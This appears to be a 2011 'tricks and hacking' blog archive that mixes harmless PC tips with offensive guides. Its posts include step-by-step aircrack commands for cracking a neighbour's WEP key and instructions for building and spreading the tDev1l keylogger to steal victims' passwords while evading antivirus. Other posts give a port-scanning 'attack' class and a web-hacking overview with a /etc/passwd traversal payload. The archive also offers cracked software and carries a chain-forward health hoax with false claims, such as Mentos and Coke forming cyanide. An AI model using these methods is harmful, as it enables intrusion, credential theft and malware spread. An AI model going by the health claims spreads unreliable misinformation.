Tuesday, May 24, 2011
AIRTEL SMS TIMER
This is new service from Airtel, not exactly a trick.
Example:
9895xxxxx 2508 2359 Happy Birthday!
Send it to 52233.
This will send the SMS at 11.59PM on 25th of August.
It will cost just Re.1 per sms.
SPEED UP ACROBAT READER (ALMOST LIKE NOTEPAD)
Adobe Acrobat reader always consumes more memory when it starts. The reason behind is, it loads all the plugins, even the plugins that you do not use. This trick is to remove all the plugins from the plugins directory to elsewhere. Hence, whenever you open Acrobat reader it directly opens the files without loading any plugins and the speed is just like Notepad.
(C:\program files\adobe\acrobat\reader\.. whatever)
2. Move all the files and folders from the "plugins" directory to the "Optional" directory. (I repeat.. cut and paste the files NOT copy & paste).
Also make sure that acrobat reader is not open else it will lock the files and not allow you to move the files).
Now your acrobat reader will load very fast and almost as good as notepad.
Monday, May 23, 2011
Access WAP Sites on PC
This tutorial will show you how to access WAP (Wireless Application Protocol) sites on your PC. Sometimes you may want to access the mobile versions of your favorite sites on your PC, but some browsers don’t support WML (Wireless Markup Language) and wont be able to display the pages.
To open WAP sites on your PC, you can use online WAP emulators or use software to do so.
Emulators:
You can use various online WAP emulators which allow you to access WAP sites using a web interface.
Some of the most popular ones include:
1. dotMobi WAP Emulator – http://mtld.mobi/emulator.php
2. WAPTiger WAP Emulator – http://www.waptiger.com/waptiger/
3. TagTag WAP Emulator – http://tagtag.com/cgi/wapemulator.cgi
Softwares:
To access WAP sites using softwares, I would recommend:
1. Opera Web Browser
Opera, the best web browser on Earth, fully supports WAP sites and allows you to surf WML pages easily.
Get Opera here: Opera Download
2. WMLBROWSER Firefox Extension
To access WAP sites in Firefox, you can install the WMLBROWSER extension. Just install the extension, go to View > Toolbars > Customize and add the WML browser Toolbar button to your toolbar. You can switch to WML ON and WML OFF to enable and disable WAP sites.
Download WMLBROWSER here: WML Browser Firefox Addon
3. WINWAP
WinWAP is a standalone WAP browser that you can use to access WAP sites on PC. It emulates cellphones, you can actually use the cellphone keys to navigate through the mobile web. You can also use different phone skins. You can get the WINWAP browser here: WinWAP Browser Emulator
Sunday, May 22, 2011
How to Hack WiFi (WEP) Using Backtrack 4
2. Open new Konsole (backtrack's terminal).
3. Type, not using qoutes, "airodump-ng wlan0". Now find the network you want to attack. Copy the BSSID and the channel (write down on piece of paper and keep handy)
4. Open new Konsole, type "airodump-ng -w wep -c 11 --bssid 00:24:b2:80:d7:3c wlan0" **X & 00:24:b2:80:d7:3c are examples of the channel and bssid you should have copied**
5. You are now fixed on to the network you want to attack.
6. Close the first Konsole, open a new Konsole and type "aireplay-ng -1 0 -a 00:24:b2:80:d7:3c wlan0" **00:24:b2:80:d7:3c is an example as well**
7. Open another new Konsole, type "aireplay-ng -3 -b 00:24:b2:80:d7:3c wlan0" **00:24:b2:80:d7:3c example"
8. Go to first Konsole, wait for the Data to reach to 30,000; go to 3rd Konsole, hit CNTL + C, then type in "dir", hit enter
9. Type "airecrack-ng wep.01.cap", hit enter.
10. Let it run its course, should only take a few moments. Once key is found, it will show up with semi-colons in it. Take out the semi-colons, and this will be the key. (Example of key; 53:06:66:51:50, so it will be 5306665150)
11. Enjoy Hacking, Enjoy Hackton.
Saturday, May 21, 2011
Remote Password Hacking/Stealer Tool
Hack E-Mail Passwords using Remote Password Hacking Tool
tDev1l keylogger is used to steal all stored passwords on victim computer. When victim opens our sent keylogger on his computer, it searches for all saved passwords on his computer and then simply sends those saved passwords along with user ids to you via email.
How to use tDev1l keylogger?
1. First of all download tDev1l keylogger from here.
You need a registration key to unlock it. Use one of these: tdev1l-its-0k-2-cry or devil-its-0k-2-cry
2. Run "tDevil.exe" file to get something like this:

3. Now simply type in your Gmail email adress and password (You can create a gmail account only for keyloggers, like this one), in "Send Logs Every Minute" choose like 30, so every 30 minutes u will get a email with the key logs. Now press "Build" and send the built app to victim. When they open nothing happens, but there keylogged and every 30 min u will get email with there key logs in.
4. To remove the Keylogger from your pc open taskmanager and kill the process "server.exe".
Now all you have to do is spread the server around and infect people with it and soon you will have lots of email in your gmail account with there Keystrokes.
5. This password stealer server is detected as virus during runtime. But, its 100% FUD (Fully Undetectable) during scantime. So, you can use Crypter / Binder to get rid of antivirus detection.
Very Important: Do not scan these tools on VirusTotal. Use http://scanner.novirusthanks.org and also check the "Do not distribute the sample" option.
Lock Your Computer With USB Flash Drive
Using this trick you will be able to lock your computer with a Usb. The computer will work only when the Usb is plugged in. Once the Usb is removed keyboard and mouse will automatically get disabled and your screen will get dark. Moreover your computer will get automatically locked. To unlock the computer you will need to insert the Usb again.
This trick will work on on all versions of windows including both windows 32 bit and 64 bit
Here is the Trick to lock Your Computer With Usb Using Predator
1. Download predator software by clicking here
2. Predator will get launched automatically after completing installation if not you can run it from Start/Programs/Predator
3. Now Insert your Usb. You will get a message to define your new password (This process will not format your pendrive and your pendrive data will not be affected by this at all)
4. Click on Ok and Enter your your new password in next dialog box
5. Check that the drive letter displayed under “USB key drive” actually matches your flash drive or choose the correct letter from the dropdown list
6. Finally click on Create Key button and then on OK button
After this the software will automatically exit.Now restart the program by clicking the icon on desktop.
Predator will take few seconds for initialization. Once the icon in the taskbar turns green then your software has initialized itself.
Friday, May 20, 2011
Please Read Them Carefully and Forward to all of Your Friends - Health is Wealth
Don't put your mobile closer to your ears until the
recipient answers, Because directly after dialing, the mobile phone would use it's maximum signaling power,
which is: 2watts = 33dbi. Please Be Careful. Please use left ear while using cell (mobile), because if you use the right one it may affect brain directly. This is a true fact from Apollo medical team.
2) APPY FIZZ
Do not drink APPY FIZZ . It contains cancer causing agent.
3) Mentos
Don't eat Mentos before or after drinking Coke or
Pepsi coz the person will die immediately as the mixture
becomes cyanide. Please fwd to whom u care.
4) Kurkure
Don't eat kurkure because it contains high amount of
plastic if U don't Believe burn kurkure n u can see
plastic melting. Please forward to all!!!!!!!!! !! News
report from Times of India
5) Avoid these tablets as they are very dangerous
* D cold
* Vicks action- 500
* Actified
* Coldarin
* Co some
* Nice
* Nimulid
* Cetrizet-D
They contain Phenyl- Propanol -Amide PPA.Which Causes strokes, and these tablets are banned in U.S.
6) Cotton Ear Buds
Cotton Ear Buds... (Must read it) Please do not show sympathy to people selling buds on roadside or at Signals..... Just wanted to warn you people not to buy those packs of ear buds you get at the roadside. It's made from cotton that has already been used in hospitals. They take all the dirty, blood and pus filled cotton, wash it, bleach it and use it to make ear buds. So, unless you want
to become the first person in the world to get Herpes Zoster Oticus (a viral infection of the inner, middle, and external ear) of the ear and that too from a cotton bud, DON'T BUY THEM! Please forward to all this may be helpful for someone..... .......
Download Unlimited From Rapidshare,Hotfile without Premium Account Tested
Hey Frens after a Huge Search over the Internet I found a absolutely wonderful site through which you can download Unlimited from sites like Rapidshare, Hotfile,Uploading,Easy-share,megaupload and much more..
CLICK HERE
You can download File with as Much as speed your Internet Connection can Support with resume option...
So Guy isn't it an Absolutely Awesome Site..
CLICK HERE
METHOD TO DOWNLOAD UNLIMITED EXPLAINED BELOW:
Step 1 : Click on the Link " CLICK HERE" . Then a webpage will open as shown below:
Step2: Copy the URL (rapidshare, hotfile or anything else..) in the Link to Transload Section..as shown:
Step3: After you click transload file and new page will open as shown and click on the link Given...
Step4: Now Thats it ..
Proxy Switcher Standard 4.6.0 Full Download
Different internet connections do often require completely different proxy server settings and it's a real pain to change them manually. Proxy Switcher provides proxy settings management solution and anonymous surfing capabilities. This includes flexible proxy server list management, proxy server tester and anonymous proxy server list downloader.
Proxy Switcher - surf anonymouslychange proxy settings on the fly
There are times when you have to cloak your true IP address. It might be that you want to remain anonymous when you visit a particular website. Or your access to various social networking and entertainment sites has been blocked.
The solution is to use Proxy Switcher for all the anonymous browsing needs. It can be used to avoid all sorts of limitations imposed by various sites. Be that a download site that limits amount of downloads. Or video site works only in a particular country - more often than not it gets defeated by the anonymous browsing features Proxy Switcher provides.
On top of that, if you used to manually change proxy settings Proxy Switcher provides a way to change them much faster and easier.Proxy Switcher Benefits:
- Hide your IP address from the web sites you visit.
- Penetrate bans and blocks on forums, classifields and download sites (rapidshare etc.).
- Automatic proxy server switching for improved anonymous surfing.
- Easy way to change proxy settings on the fly.
- For webmasters - check search engine results from different countries.
- Fully compatible with Internet Explorer, Firefox, Opera and others.
- Advanced proxy list scanning and management.Proxy Switcher 4.6.0 News
- Improved javascript enabled parser reliability, should avoid some crashes.
- Added new proxy list parsing engine - as a result new proxy list sites are added.
- Added new subcategory for Dead servers - permanently dead, ones that go into there will not get rechecked as often.
- Added check for presence of new version on site - will be shown in log.
- Program restores auto switching state after restart.
- Reduced used resources when idle even further (unused scanner workers are shut down).
Updated Ip2Country.Release Date: 31/03/2010
Language: English
Crack: +
Download Links:
Hacking Class 4 - Scanning and Attacking Open Ports
This Blog
* antivirus and spyware
* free downloads
* spyware terminator
* definitions
* tutorials
Hacking Class 4 - Scanning and Attacking Open Ports
Posted by Lokesh@Admin on Tuesday, October 20, 2009
17 comments
In my Previous class I have explained about footprinting i.e getting the IP of the Person/website/organisation whom you want to attack and extracting the personal Information.. You all were thinking that what was the use of that .. In this class you will came to know why we have undergo footprinting and analysis part...
In Scanning Part We Will Cover the Following Topics in details :
~ Definition of scanning
~ Types and objectives of Scanning
~ Understanding Scanning methodology
~ Checking live systems and open ports
~ Understanding scanning techniques
~ Different tools present to perform Scanning
~ Understanding banner grabbing and OS fingerprinting
~ Drawing network diagrams of vulnerable hosts
~ Preparing proxies
~ Understanding anonymizers
~ Scanning countermeasures
Hacking Class 4 - Scanning and Attacking Open Ports
What Is Scanning ?? And Why We Focus On that ?
Scanning as from the name means that we will scan something to find some details etc etc... Scanning basically refers to the gathering of following four informations...
We Scan systems for four basic purposes :-
* To find specific IP address
* Operating system
* System Architecture
* Services Running on system
The various types of scanning are as follows:
~Port Scanning
~Network Scanning
~Vulnerability Scanning
I want to Define These Terms here Only as they are of great use in further tutorial...
PORT SCANNING : There are 64k ports in a computer out of which 1k are fixed for system or OS services. In Port scanning we scan for the open Ports which can be used to attack the victim computer.
In Port scanning a series of messages sent to break into a computer to learn about the computer’s network services. Through this we will know that which port we will use to attack the victim..
Network Scanning : Network scanning is basically a procedure of finding the active hosts on the Network.
i.e We tries to find that system is standalone or multiuser...
This is done either for the purpose of attacking them or for network security assessment i.e how secured the network Is ??
Vulnerability Scanning : As from the name , In this type of scanning We scan the systems for finding the vulnerability i.e the weakness in OS/database ... Once we find the vulnerability or loop hole we can utilize it to Best..and attack the victim through that ...
OBJECTIVES OF SCANNING
These are Primary objectives of scanning i.e why do we do scanning :
~ To detect the live systems running on the network.
~ To discover which ports are active/running.
~ To discover the operating system running on the target system (fingerprinting).
~ To discover the services running on the target system.
~ To discover the IP address of the target system.
We will prefer TOOLS for this because they will reduce our Hectic Work... The first Tool that we Use is the NMAP :
DOWNLOAD :http://nmap.org/dist/nmap-5.00-setup.exe
Features of NMAP :
~ Nmap is used to carry out port scanning, OS detection, version detection, ping sweep, and many other techniques.
~ It scans a large number of machines at one time.
~ It is supported by many operating systems.
~ It can carry out all types of port scanning techniques.
Hacking Class 4 - Scanning and Attacking Open Ports
SECOND TOOL IS NET TOOLS 5.0.70 :
Itz is a collection of various Networking Tools ... must for beginners...
DOWNLOAD: http://www.softpedia.com/progDownload/Net-Tools-Download-22193.html
~ Net Tools Suite Pack is a collection of scanning tools.
~ This toolset contains tons of port scanners, flooders, web rippers, and mass e-mailers.
Note: Some of these tools may not Work but some are too good.
Hacking Class 4 - Scanning and Attacking Open Ports
Hacking Class 4 - Scanning and Attacking Open Ports
Thursday, May 19, 2011
How to hack a Website or websites database
As we know traces are very important. Please don't ignore them otherwise you can be in big trouble for simply doing nothing. so please take care of this step.
The primary form of SQL injection consists of direct insertion of code into user-input variables that are concatenated with SQL commands and executed. A less direct attack injects malicious code into strings that are destined for storage in a table or as metadata. When the stored strings are subsequently concatenated into a dynamic SQL command, the malicious code is executed.
- how to hack
- applications
- cookie delivery
- free person search
- virus protection
For more basic knowledge about SQL injection visit:
http://www.isoftdl.com/2009/12/hacking-class-14-how-to-deface-websites.html
The above tutorial consists of both types of SQL injection i.e. Manual and automatic through softwares. I will explain SQL injection in more detail with practical example in Next class.
Some website features commonly vulnerable to XSS attacks are:
• Search Engines
• Login Forms
• Comment Fields
- college classes
- readings
- rapidshare premium account
- how to hack
- applications
Cross-site scripting holes are web application vulnerabilities that allow attackers to bypass client-side security mechanisms normally imposed on web content by modern browsers. By finding ways of injecting malicious scripts into web pages, an attacker can gain elevated access privileges to sensitive page content, session cookies, and a variety of other information maintained by the browser on behalf of the user. Cross-site scripting attacks are therefore a special case of code injection.
I will explain this in detail in later hacking classes. So keep reading..
3. REMOTE FILE INCLUSION
Remote file inclusion is the most often found vulnerability on the website.
Remote File Inclusion (RFI) occurs when a remote file, usually a shell (a graphical interface for browsing remote files and running your own code on a server), is included into a website which allows the hacker to execute server side commands as the current logged on user, and have access to files on the server. With this power the hacker can continue on to use local
exploits to escalate his privileges and take over the whole system.
RFI can lead to following serious things on website :
- Code execution on the web server
- Code execution on the client-side such as Javascript which can lead to other attacks such as cross site scripting (XSS).
- Denial of Service (DoS)
- Data Theft/Manipulation
4. LOCAL FILE INCLUSION
Local File Inclusion (LFI) is when you have the ability to browse through the server by means of directory transversal. One of the most common uses of LFI is to discover the /etc/passwd file. This file contains the user information of a Linux system. Hackers find sites vulnerable to LFI the same way I discussed for RFI’s.
Let’s say a hacker found a vulnerable site, www.target-site.com/index.php?p=about, by means of directory transversal he would try to browse to the /etc/passwd file:
www.target-site.com/index.php?p= ../../../../../../../etc/passwd
I will explain it in detail with practical websites example in latter sequential classes on Website Hacking.
For more detailed hack on DDOS visit:
http://www.isoftdl.com/2009/11/hacking-class-11-attacking-websitesddos.html
I hope you all now have a overview of that what is Website Hacking. In consecutive future classes i will explain all of these techniques in details. So guys keep reading..
Best Operating System for Hackers
- Based on: Debian, Ubuntu
- Origin: Switzerland
- Architecture: i386
- Desktop: Fluxbox, KDE
- Category: Forensics, Rescue, Live Medium
- Cost: Free
- Metasploit integration
- RFMON Injection capable wireless drivers
- Kismet
- Nmap
- Ettercap
- Wireshark (formerly known as Ethereal)
- BeEF (Browser Exploitation Framework)
- Information Gathering
- Network Mapping
- Vulnerability Identification
- Web Application Analysis
- Radio Network Analysis (802.11, Bluetooth, Rfid)
- Penetration (Exploit & Social Engineering Toolkit)
- Privilege Escalation
- Maintaining Access
- Digital Forensics
- Reverse Engineering
- Voice Over IP
eBoostr PRO v4.0 Build 544b - Use USB drive as RAM
If there is one thing that can speed up your computer, it's memory. Adding more RAM can speed up your applications several times, decrease loading times and improve overall performance of your PC. More memory means less hard drive activity. But what if adding more RAM is not an option for you? Maybe you just don't have the necessary tools or experience, or just aren't comfortable with the idea of getting inside your PC. Or maybe you've got a notebook computer that's stuffed with RAM sticks or uses exotic and expensive memory. Or quite the opposite, you might already have enough RAM and adding more memory does not result in any visible performance benefits.Windows Vista enjoys ReadyBoost technology that uses external flash memory to speed up system performance without adding more RAM. But what if you use Windows XP and have no intention of upgrading?Hold on to your Windows XP system! There is no need to upgrade just for the sake of ReadyBoost! eBoostr speeds up Windows XP by using inexpensive flash memory. Using eBoostr increases system responsiveness and makes big applications such as Adobe Photoshop or Microsoft Office load much faster.
Unlike ReadyBoost, eBoostr is able to use almost any flash memory, including ReadyBoost certified units. Use up to four USB sticks, CompactFlash, SD, MMC or xD cards to give your Windows XP system a boost!eBoostr works perfectly for desktop computers, but laptop users gain even more. Laptop computers use slower hard drives than their desktop counterparts, and benefit even more from reducedhard drive activity provided by eBoostr. Notebooks not only work faster with eBoostr; they work longer. Less hard drive activity means less power consumption, which results in longer battery life.You might already have one or more flash sticks or memory cards sitting on your desk or in your digital camera. Plug them in, run eBoostr and enjoy the extra speed boost!
Key features of "eBoostr":
· Smart caches frequently used applications and files for maximum performance speed up;
· Supports both USB and non-USB removable media devices, as well as additional hard disks;
· Allows up to 4 devices for simultaneous smart caching;
· Compatible with all ReadyBoost ready devices.
What's New:-
· full Windows 7 compatibility
· new option of using hidden system memory for caching
Homepage - www.eboostr.com/
eBoostr PRO v4.0 Build 544b - Use USB drive as RAM
If there is one thing that can speed up your computer, it's memory. Adding more RAM can speed up your applications several times, decrease loading times and improve overall performance of your PC. More memory means less hard drive activity. But what if adding more RAM is not an option for you? Maybe you just don't have the necessary tools or experience, or just aren't comfortable with the idea of getting inside your PC. Or maybe you've got a notebook computer that's stuffed with RAM sticks or uses exotic and expensive memory. Or quite the opposite, you might already have enough RAM and adding more memory does not result in any visible performance benefits.Windows Vista enjoys ReadyBoost technology that uses external flash memory to speed up system performance without adding more RAM. But what if you use Windows XP and have no intention of upgrading?Hold on to your Windows XP system! There is no need to upgrade just for the sake of ReadyBoost! eBoostr speeds up Windows XP by using inexpensive flash memory. Using eBoostr increases system responsiveness and makes big applications such as Adobe Photoshop or Microsoft Office load much faster.
Unlike ReadyBoost, eBoostr is able to use almost any flash memory, including ReadyBoost certified units. Use up to four USB sticks, CompactFlash, SD, MMC or xD cards to give your Windows XP system a boost!eBoostr works perfectly for desktop computers, but laptop users gain even more. Laptop computers use slower hard drives than their desktop counterparts, and benefit even more from reducedhard drive activity provided by eBoostr. Notebooks not only work faster with eBoostr; they work longer. Less hard drive activity means less power consumption, which results in longer battery life.You might already have one or more flash sticks or memory cards sitting on your desk or in your digital camera. Plug them in, run eBoostr and enjoy the extra speed boost!
Key features of "eBoostr":
· Smart caches frequently used applications and files for maximum performance speed up;
· Supports both USB and non-USB removable media devices, as well as additional hard disks;
· Allows up to 4 devices for simultaneous smart caching;
· Compatible with all ReadyBoost ready devices.
What's New:-
· full Windows 7 compatibility
· new option of using hidden system memory for caching
Homepage - www.eboostr.com/
Watch TV Online -20 Free Online TV Websites
Free Online TV Websites